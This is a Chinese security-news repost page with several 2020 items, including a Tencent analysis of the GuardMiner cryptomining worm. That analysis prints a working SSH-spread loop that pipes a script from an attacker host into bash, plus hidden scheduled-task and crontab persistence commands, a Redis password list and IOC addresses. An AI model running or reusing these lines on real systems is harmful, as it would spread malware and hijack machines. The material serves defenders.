内容转载

= ̄ω ̄= 内容转载

Windows 10 Version 2004 新 BUG:重复报告安全警报

上月发布的 Windows 10 May 2020(20H1/Version 2004)功能更新在安全方面引入了诸多改进,其中就包括阻止潜在不必要程序(PUP/PUA)的能力。微软表示 PUP 包括各种类型的系统软件捆绑、驱动程序和注册表优化器等。 不过近日 Version 2004 用户反馈,即使在 PUP 应用程序被清理之后,Windows Security 应用程序依然会触发警报。在 PUP 应用程序被移除或者允许在 Windows 10 上运行之后,Windows Security 在随后的扫描中依然会检测到旧项目,造成错误的检测循环。 一位用户指出:“我在进行常规扫描时,发现这些威胁被高亮显示为低级,而且 Defender 无法删除它们,导致一直显示。我同样使用了 Malwarebytes 进行扫描,但这边并没有显示出来。” 看来,Windows Defender 已经被默认为在Windows 10 Version 2004 中识别 PUP 为威胁。在 PUP 被删除后,Windows Defender 在随后的历史记录扫描中又将同一文件识别为威胁。 想要修复这个问题,你需要通过以下步骤删除PUPs历史信息: 1.打开 “文件资源管理器”。 2.导航到C:/程序数据/Microsoft/Windows Defender/Scans/History/Service。 3.在服务文件夹中,删除PUP相关文件。 4.重启Windows并在Windows安全应用中进行快速扫描。     (稿源:cnBeta,封面源自网络。)  

报告显示大部分人愿意分享个人隐私数据以阻止新冠疫情

市场研究公司eMarketer刚刚发布了一份关于COVID-19与数据隐私交叉点的实质性新报告。这份报告暗示我们中的一些人在新冠疫情消退后仍会同意接触追踪等技术。eMarketer表示,部分用户一旦看到了联系人追踪应用程序,一旦现它起作用了,如果他们确信它能充分保护你的隐私,也许他们会愿意继续使用类似的东西。 eMarketer引用的一项研究发现,我们几乎大多数人都接受健康和位置追踪,以监测那些已经被检测出病毒阳性的人,而其他用途则被大多数受访者反对。当提到这个话题时,我们大多数人都会想到通过手机进行联系追踪,但eMarketer介绍了在全球各个地区,从信用卡交易到面部识别等一切都在被追踪。这些数据被用来编制谁已经或正在传播冠状病毒的档案。 尽管医疗卫生界正在就进一步了解这种病毒达成共识。但是民众处在一个非常分裂的时期。任何人都可以从不同的角度看待其中的一些数据,并有不同的看法。消费者何时会分享他们接触过的人来减缓或停止COVID-19,其中的情况很复杂,但我们大多数人仍然对这个想法持谨慎态度。基于COVID-19共享数据对用户进行定位可能是杀鸡取卵的做法,并可能限制他们在下一波或下一波病毒攻击时共享数据的意愿。     (稿源:cnBeta,封面源自网络。)

德法院裁定 Facebook 需遵守监管命令:限制其收集用户数据

德国联邦法院周二裁定,Facebook必须遵守德国反垄断监管机构颁布的一项限制收集用户数据的命令,这对该公司来说是个挫败。联邦法院发布了一项暂缓执行令,暂停了下级法院的一项裁决,支持联邦卡特尔办公室(Federal Cartel Office)最初的观点,即Facebook滥用其市场主导地位,在未经许可的情况下收集用户信息。 “我对这项裁决感到高兴。”联邦卡特尔办公室主席安德烈亚斯·蒙特(Andreas Mundt)表示,原因是其表明“如果数据被非法收集和利用,应有可能采取反垄断行动以防市场力量被滥用”。 Facebook表示,这项最新的裁决与仍在继续的上诉程序之间没有直接关系。该公司表示:“我们将继续捍卫自己的立场,即我们并未从事反垄断的滥用行为。对于使用我们产品和服务的德国个人或企业来说,不会马上有什么变化。” 德国一直站在全球抵制Facebook的前沿,该公司面临着越来越多的批评,称其平台被用来传播政治虚假信息。 德国联邦法院在裁决中称其不反对卡特尔办公室的结论,即Facebook滥用其市场主导地位,而且该公司使用数据的行为并未得到用户的充分许可。   (稿源:新浪科技,封面源自网络。)

Microsoft Edge 未经允许静默导入 Firefox 数据

有用户发现通过 Windows Update 更新到设备的新版 Edge 会出现从 Firefox 导入数据的情况,即便用户未授权 Edge 进行此操作。 根据 krankie 的描述,微软在 UI 方面设计了一些元素来“欺骗和误导”用户。更新完系统,待 Edge 安装完成后,微软会显示一个最大化的 Edge 窗口给用户,但它会先弹出一个只包含”Get Started”按钮的模态对话框。因此用户无法直接关闭 Edge 也无法关闭模态对话框。唯一的选择是使用任务管理器来杀死此进程。不过即便关闭了它,Edge 也会自动固定到任务栏上。 最后他还提到,新版 Edge 未经用户允许就从其他浏览器中导入数据。 “除非通过任务管理器关闭它而不是执行强制设置,否则无论如何它都会复制数据,最糟糕的是大多数人永远不会知道 Edge 在做什么,因为他们再也不会打开它”。 除此之外,微软还会取消系统的默认浏览器设置,所以当用户点击一个 URL 时,需要重新选择默认浏览器。 微软对此一直保持沉默。因此,尽管最初的向导实际上是由用户手动杀死的,但到目前为止,仍不知道将 Edge 数据导入 Firefox 数据的原因。   (稿源:开源中国,封面源自网络。)

Red Hat 报告了一个安全问题,可导致 DoS

Red Hat 近日报告了一个内核中的安全问题,根据描述,Red Hat 内核在“关联数据的身份验证加密”(AEAD,Authenticated Encryption with Associated Data)中存在缺陷,这是一种加密技术。具体是在 IPsec 加密算法模块 authenc 的 crypto/authenc.c 中的 crypto_authenc_extractkeys 中发现了缓冲区超读漏洞。当有效载荷大于 4 字节且未遵循 4 字节对齐边界准则时,它将导致缓冲区超读威胁,从而导致系统崩溃。此漏洞使具有用户特权的本地攻击者可以执行拒绝服务。 目前该漏洞已录入 CVE-2020-10769。 不过该问题在 17 个月前也就是 19 年 1 月的 Linux LTS 内核上游中已经修复过了,详情见 https://lkml.org/lkml/2019/1/21/675。 并且在 14 个月前,该问题的回归测试也已经提交到了 LTP(Linux Test Project,Linux 测试项目),此次发现这一特定下游问题,应当是 LTP 测试未通过导致的。因此报告安全的邮件中提醒:“大多数 Linux 内核已经修复了这一错误,而没有在 LTP 中添加回归测试,这意味着挑选特定内核补丁来修复 LTP 问题不如合并所有 LTS 内核修复程序来得稳妥。”   (稿源:开源中国,封面源自网络。)

Chrome 恶意扩展窃取个人资料,已被下载超 3 千万次

谷歌的 Chrome Web Store 受到迄今为止规模最大的监视活动的打击。截止 2020 年 5 月,该活动通过下载超过 3200 万次的恶意扩展程序成功窃取了来自全球用户的数据。 Awake 安全威胁研究团队发布了一份研究报告指出,其发现了一个大规模的全球监视活动,该活动利用 Internet 域注册和浏览器功能的性质来监视和窃取来自多个地区和行业细分市场的用户的数据。研究表明,此犯罪活动是由单个 Internet 域注册商:CommuniGal Communication Ltd. (GalComm) 促进的。 并表示, 通过利用作为域名注册商的信任,GalComm 已启用了恶意活动,且该恶意活动已在检查的一百多个网络中被发现。此外,即使在网络安全方面进行了大量投资的复杂组织中,恶意活动也能够通过绕过多层安全控制措施而得以隐藏。 Awake 在报告中指出,通过 GalComm 注册的可访问域有 26,079 个,其中超过 15,000 个域为恶意或可疑。 仅在过去的三个月中,其就使用 GalComm 域收集了 111 个恶意或伪造的 Chrome 扩展程序,这些域用于攻击者的命令和控制基础结构和/或用作扩展程序的加载程序页面。这些扩展名可以截取屏幕截图、读取剪贴板、获取存储在 cookie 或参数中的凭据令牌,以及获取用户的击键(例如密码)等。 引诱安装恶意 Chrome 扩展程序的示例 截止 2020 年 5 月,这 111 个恶意扩展下载次数已达到 32,962,951 次。Awake 表示,该公司已与 Google 合作,着手从 Chrome 网上应用店中删除这些扩展程序。 针对此事,GalComm 负责人 Moshe Fogel 在与路透社的通信中则指出,“GalСomm 不参与任何恶意活动,可以说恰恰相反,我们与执法和安全机构合作,尽我们所能防止”。在 Awake Security 发表报告并列出所有可疑域名后, Moshe Fogel 也表示这些域名使用情况几乎都不活跃,并会继续调查其他域名。 有关报告的更多详细信息可查看:https://awakesecurity.com/blog/the-internets-new-arms-dealers-malicious-domain-registrars/   (稿源:cnBeta,封面源自网络。)

BlueLeaks 曝光了美国数百个警察部门内部文件 总容量接近 270 GB

上周,美国各地警察部门的数十万份潜在敏感文件在网上泄露。这个被称为 “BlueLeaks “并可在网上搜索的集合,源于德克萨斯州一家网页设计和托管公司的安全漏洞,该公司维护着一些州的执法数据共享门户。该集合总容量近270GB,是分布式拒绝秘密(DDoSecrets)的最新发布,DDoSecrets是维基解密的另一种选择。 DDoSecrets在Twitter上发文称,BlueLeaks档案索引了 来自200多个警察部门、融合中心和其他执法培训和支持资源的十年数据,在数十万份文件中,有警察和FBI的报告、公告、指南等。融合中心是由国家拥有和运营的实体,在州、地方、部落和地区、联邦和私营部门合作伙伴之间收集和传播执法和公共安全信息。KrebsOnSecurity获得了美国国家融合中心协会(NFCA)6月20日的内部分析,证实了泄露数据的有效性。NFCA提醒指出,泄露文件的日期实际上跨越了近24年,从1996年8月到2020年6月19日,文件包括姓名、电子邮件地址、电话号码、PDF文件、图像以及大量的文本、视频、CSV和ZIP文件。 此外,数据转储还包含电子邮件和相关附件,初步分析显示,其中一些文件包含高度敏感的信息,如ACH路由号码,国际银行账户号码(IBAN)和其他金融数据,以及个人身份信息(PII)和信息请求(RFI)和其他执法和政府机构报告中列出的嫌疑人的图像。NFCA表示,BlueLeaks公布的数据似乎是在总部位于休斯顿的网络开发公司Netsential发生安全漏洞后获取的。对此次泄密事件中包含的数据的初步分析表明,Netsential是美国多个融合中心、执法部门和其他政府机构使用的网络服务公司,是此次泄密事件的源头。 NFCA表示,各种网络威胁行为者,包括民族国家、黑客活动家和有经济动机的网络犯罪分子,可能会寻求利用此次泄密事件中暴露的数据,针对融合中心和相关机构及其人员进行各种网络攻击和活动。BlueLeaks数据集发布于6月19日,又称 “六月十九日”,是美国历史最悠久的结束奴隶制的全国性纪念活动。在广泛抗议乔治-弗洛伊德被明尼阿波利斯警察杀害事件后,今年的纪念日再次引起公众的兴趣。   (稿源:cnBeta,封面源自网络。)  

GuardMiner 挖矿木马近期活跃,具备蠕虫化主动攻击能力,已有较多企业中招

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/-nUrNilr-iq7kbmopaqXwA   概述 腾讯安全威胁情报中心检测到跨平台挖矿木马GuardMiner近期十分活跃,该木马会扫描攻击Redis、Drupal、Hadoop、Spring、thinkphp、WebLogic、SQLServer、Elasticsearch多个服务器组件漏洞,并在攻陷的Windows和Linux系统中分别执行恶意脚本init.ps1,init.sh,恶意脚本会进一步下载门罗币挖矿木马、清除竞品挖矿木马并进行本地持久化运行。在Linux系统上利用SSH连接和Redis弱口令爆破进行内网扩散攻击。因挖矿守护进程使用文件名为sysguard、sysguerd、phpguard,腾讯安全威胁情报中心将该挖矿木马命名为GuardMiner。因该病毒已具备蠕虫化主动攻击扩散的能力,近期已有较多企业中招。 样本分析 1、init.ps1攻击Windows系统,从服务器下载挖矿进程phpupdate.exe,配置文件config.json,扫描攻击进程networkmanager.exe,持久化脚本newdat.ps1,挖矿守护进程phpguard.exe,清理脚本clean.bat。 2、init.sh攻击Linux系统,从服务器下载挖矿进程phpupdate,配置文件config.json,持久化脚本newdat.sh,扫描攻击进程networkmanager,挖矿守护进程phpuguard。 3、门罗币挖矿进程phpupdate.exe占用CPU接近100%: 挖矿使用的三组矿池和钱包分别如下: xmr.f2pool.com:13531 43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520 xmr-eu2.nanopool.org:14444 43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520 randomxmonero.hk.nicehash.com:3380 3HVQkSGfvyyQ8ACpShBhegoKGLuTCMCiAr.v520 4、清除竞品挖矿木马文件: 5、phpguard.exe、phpguard负责守护挖矿进程,进程退出后立即重启: 6、在Windows系统上通过安装计划任务持久化,每隔30分钟执行一次newdat.ps1: SchTasks.exe /Create /SC MINUTE /TN "Update service for Windows Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File $HOME\newdat.ps1" /MO 30 /F 在Linux系统上通过定时任务持久化,每隔30分钟执行一次newdat.sh: crontab -l ; echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1"   7、在Linux系统上还会通过sshown_hosts获取登录过的机器IP,建立SSH连接并执行远程shell脚本is.sh,进行内网扩散攻击: `if [ -f /root/.sshown_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” /root/.sshown_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘curl -o-  http[:]//global.bitmex.com.de/cf67355a3333e6/is.sh | bash >/dev/null 2>&1 &’ & done fi` is.sh接着安装扫描工具Pnscan和Masscan针对全网段IP范围进行6379端口(Redis服务)扫描,并通过Redis弱口令爆破(密码字典:redis、root、oracle、password、p@aaw0rd、abc123、abc123!、123456、admin)以及未授权访问漏洞感染执行init.sh: 8、Windows系统上执行networkmanager.exe,Linux系统上执行networkmanager,开启漏洞扫描和利用攻击,针对以下服务器组件,攻击成功后在Windows系统执行Powershell脚本,在Linux系统执行shell脚本进行进行感染:Redis未授权访问漏洞; Drupal框架CVE-2018-7600漏洞; Hadoop未授权漏洞; Spring框架CVE-2018-1273漏洞; thinkphp框架TP5高危漏洞; WebLogic框架CVE-2017-10271漏洞; SQLServer框架xcmd_shell、SP_OACreate注入提权漏洞; Elasticsearch框架CVE-2015-1427、CVE-2014-3120远程代码执行漏洞。   病毒清除建议: 1.Windows系统用户推荐使用腾讯T-sec终端安全管理系统(腾讯御点)查杀; 2.Linux系统用户可按以下步骤手动清除: a.检查tmp、etc目录下是否具有以下文件,杀死对应的进程并删除文件: /tmp/phpupdate /tmp/networkmanager /tmp/phpguard /tmp/newdat.sh /tmp/config.json /etc/phpupdate /etc/networkmanager /etc/config.json /etc/newdat.sh b.检查crontab计划任务中是否包含执行”/tmp/newdat.sh”相关代码,如有删除该定时任务。 IOCs IP 185.247.117.64 209.182.218.161 178.157.91.26 146.71.79.230 43.245.222.57 URL http[:]//185.247.117.64/cf67355/phpupdate http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate http[:]//185.247.117.64/cf67355/newdat.sh http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.sh http[:]//185.247.117.64/cf67355/config.json http[:]//global.bitmex.com.de/cf67355a3333e6/config.json http[:]//185.247.117.64/cf67355/networkmanager http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager http[:]//185.247.117.64/cf67355/phpguard http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard http[:]//185.247.117.64/cf67355/phpupdate.exe http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate.exe http[:]//185.247.117.64/cf67355/config.json http[:]//global.bitmex.com.de/cf67355a3333e6/config.json http[:]//185.247.117.64/cf67355/networkmanager.exe http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager.exe http[:]//185.247.117.64/cf67355/newdat.ps1 http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.ps1 http[:]//185.247.117.64/cf67355/phpguard.exe http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard.exe http[:]//185.247.117.64/cf67355/clean.bat http[:]//global.bitmex.com.de/cf67355a3333e6/clean.bat    

多阶段 APT 攻击使用 C2 功能降低 Cobalt Strike

6月10日,我们发现了一个伪装成简历的恶意Word文档,它使用模板注入来删除一个Net Loader。这是我们认为是APT攻击的一个部分,在最后阶段,威胁者使用Cobalt Strike的C2特性下载最终的有效载荷并执行C2通信。 这次袭击因为它的躲避技巧显得特别聪明。如我们观察到在执行来自恶意Word宏的有效负载时存在故意延迟。此外,通过将shell代码隐藏在一个无害的 JavaScript中并在不触及磁盘的情况下加载它,APT可以进一步阻止安全检测。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1248/     消息来源:malwarebyte,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

黑客利用图形验证来忽悠真人下载恶意文件并逃避自动化检测

微软安全情报团队于近日曝光了黑客组织 CHIMBORAZO 的新动向,作为 Dudear 和信息窃取木马 GraceWire 的幕后黑手,其再次将目光瞄向了被各大网站用于真人检测的 CAPTCHA 图形验证码。与模糊、扭曲的数字或字母相比,上线十余年的图形验证码能够将许多别有用心者阻挡在外,然而 Chimborazo 却想到了一个更骚的操作。 微软安全情报团队指出,他们从今年 1 月开始的追踪分析发现,该组织有在要求用户完成 CAPTCHA 验证的站点上分发恶意的 Excel 文档。 这个电子表格文件中包含了宏操作,启用后便会在受害者机器上安装可窃取密码等敏感信息的 GraceWire 木马。 此前微软有在网络钓鱼邮件活动中发现 Chimborazo 采取的类似操作(在附件中分发恶意 Excel 文件),然后通过嵌入式的 Web 链接进行传播。 最近几周,该组织开始改变策略,将链接重定向到被破坏的合法站点、或在邮件中包含具有恶意 iframe 标签的 HTML 附件。 无论哪种方式,点击链接或附件都可能导致受害者下载恶意站点上的木马文件,但前提是忽悠人们完成 CAPTCHA 图形验证(通常是为了阻挡机器人)。 这个鬼点子意味着只有真人才会上当,安全研究机构使用的基于自动化分析的传统方案将更加难以检测到它们的不法行为。 微软安全情报小组曾在今年 1 月发现,Chimborazo 在利用 IP 追溯服务来跟踪下载恶意 Excel 文件的计算机的 IP 地址,以进一步逃避自动检测,那时也是微软第一次见到该组织利用此类站点重定向。 Malwarebytes 威胁情报主管 Jérôme Segura 补充道:在恶意软件攻击中使用图形验证码的方式极为罕见,但此前也并非没有先例。 可即便是简化或翻版的 CAPTCHA 方案,也都能达到忽悠真人来下载文件、同时阻止自动化分析的目的。     (稿源:cnBeta,封面源自网络。)